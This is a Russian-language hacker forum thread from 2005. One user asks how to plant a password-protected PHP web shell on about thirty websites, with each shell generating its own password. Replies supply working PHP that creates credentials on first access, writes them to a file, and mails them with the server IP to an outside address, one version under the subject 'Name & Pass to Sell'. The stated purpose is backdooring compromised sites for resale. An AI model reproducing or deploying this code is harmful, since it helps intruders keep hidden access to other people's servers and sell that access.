Вопрос по PHP
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопрос по PHP - 2005-09-15 18:41:15
|
|
|
ne0-x
Сообщений: 15
Оценки: 0
Присоединился: 2005-08-26 22:30:57
|
Господа Хацкеры!
Если кто знает то помогите по такой теме:
Есть web-шелл написанный на PHP, поддерживающий авторизацию. Хочу закачать его на множество сайтов(порядка 30), да так чтоб на каждом был разный пароль для авторизации. Но при этом, не хочется каждый раз перед закачкой, лезть в исходники и изменять пароль.
Возможно ли в этот шел вставить PHP-скрипт, который бы при первом обращении к шеллу автоматически генерировал пароль и отсылал их на указанное мыло?
Если у кого есть такой скрипт, выложите плиз!
|
|
|
|
|
Вопрос по PHP - 2005-09-15 22:05:42
|
|
|
jEnizix
Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50
|
ща сделаю…
|
|
|
|
|
Вопрос по PHP - 2005-09-15 22:24:55
|
|
|
jEnizix
Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50
|
<?
$rnd = rand(111111,999999);
$message = "Password: ".$rnd." from ".$_SERVER['SERVER_ADDR'];
$to = "your@mail.ru";
mail($to, "pass from shell", $message);
?>
|
|
|
|
|
Вопрос по PHP - 2005-09-15 22:43:37
|
|
|
ne0-x
Сообщений: 15
Оценки: 0
Присоединился: 2005-08-26 22:30:57
|
Jenizix огромный тебе респект!
Сильно вырочил!
Буду пробовать.
|
|
|
|
|
Вопрос по PHP - 2005-09-15 23:30:53
|
|
|
ne0-x
Сообщений: 15
Оценки: 0
Присоединился: 2005-08-26 22:30:57
|
Jenizix извини за назойливость, но так как в PHP я шарю не очень, возникли вопросы:
Вот кусок кода моего шела запрашивающий авторизацию:
<?php
$name="root"; // логин пользователя
$pass=""; // пароль пользователя
if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
{
header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
header("HTTP/1.0 401 Unauthorized");
exit("Access Denied");
}
?>
Твой скрипт как я понял, выполняет исключительно генерацию паролей и отправку их на мыло, при этом не добовляя его в $pass="";
Что надо дописать в этот код чтоб он:
а)Записавал сгенирированный пароль в $pass="";
б)Генерировал пароль только один раз, при первом обращении к шелу.
(т.к. данный скрипт генерирует пас и отправляет на мыло каждый раз при обращении к нему)
Заранее благодарен!
P.S. Если тебе в напряг писать этот скрипт, то напиши мне его под заказ.
О цене думаю договоримся.
|
|
|
|
|
Вопрос по PHP - 2005-09-15 23:42:29
|
|
|
jEnizix
Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50
|
да ща накатаю…
|
|
|
|
|
Вопрос по PHP - 2005-09-16 01:19:54
|
|
|
jEnizix
Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50
|
Вот накатал: http://jenizix.net.ru/tmp/shell.txt
с тебя крутой шелл! [sm=sm203.gif]
|
|
|
|
|
Вопрос по PHP - 2005-09-16 01:41:20
|
|
|
AL
Сообщений: 515
Оценки: 0
Присоединился: 2004-07-19 03:19:44
|
Это мой вариант:
——————————————-
<?
if(!file_exists("shellpass.php"))
{
$name = rand(111111,999999);
$chars="qazxswedcvfrtgbnhyujmkiolp1234567890QAZXSWEDCVFRTGBNHYUJMKIOLP";
$max=10;
$size=StrLen($chars)-1;
$pass=null; while($max–)
$pass.=$chars[rand(0,$size)];
$shell_enter_rec="<?\n\$name = \"$name\";\n \$pass = \"$pass\";\n?>";
$file = fopen("shellpass.php", "w");
fwrite($file, $shell_enter_rec);
fclose($file);
$message = "Name: ".$name."\n Pass: ".$pass."\n IP: ".$_SERVER['SERVER_ADDR'];
mail("mail@mail.ru", "Name & Pass to Sell", $message);
exit;
}
else
{
require "shellpass.php";
if(!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) ||
$HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name ||
$HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
{
header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
header("HTTP/1.0 401 Unauthorized");
exit("Access Denied");
}
else
{
echo "Тут твой шелл";
}
}
?>
——————————————-
С надеждой на шелл[sm=9.gif][sm=go139.gif]
|
|
|
|
|
Вопрос по PHP - 2005-09-16 01:55:05
|
|
|
AL
Сообщений: 515
Оценки: 0
Присоединился: 2004-07-19 03:19:44
|
Jenizix, у тебя постоянно первый запуск, постоянно пароль меняется и постоянно mail'ы шлются….. Ну, в общем,, ты, надеюсь, сам заметишь….[sm=go139.gif]
|
|
|
|
|
Вопрос по PHP - 2005-09-16 02:25:53
|
|
|
jEnizix
Сообщений: 1797
Оценки: 0
Присоединился: 2004-12-30 11:03:50
|
у меня все ок!
|
|
|
|
|
Вопрос по PHP - 2005-09-16 03:12:12
|
|
|
AL
Сообщений: 515
Оценки: 0
Присоединился: 2004-07-19 03:19:44
|
Да Jenizix, пордон. Код рабочий……[sm=go139.gif]
|
|
|
|
|
|
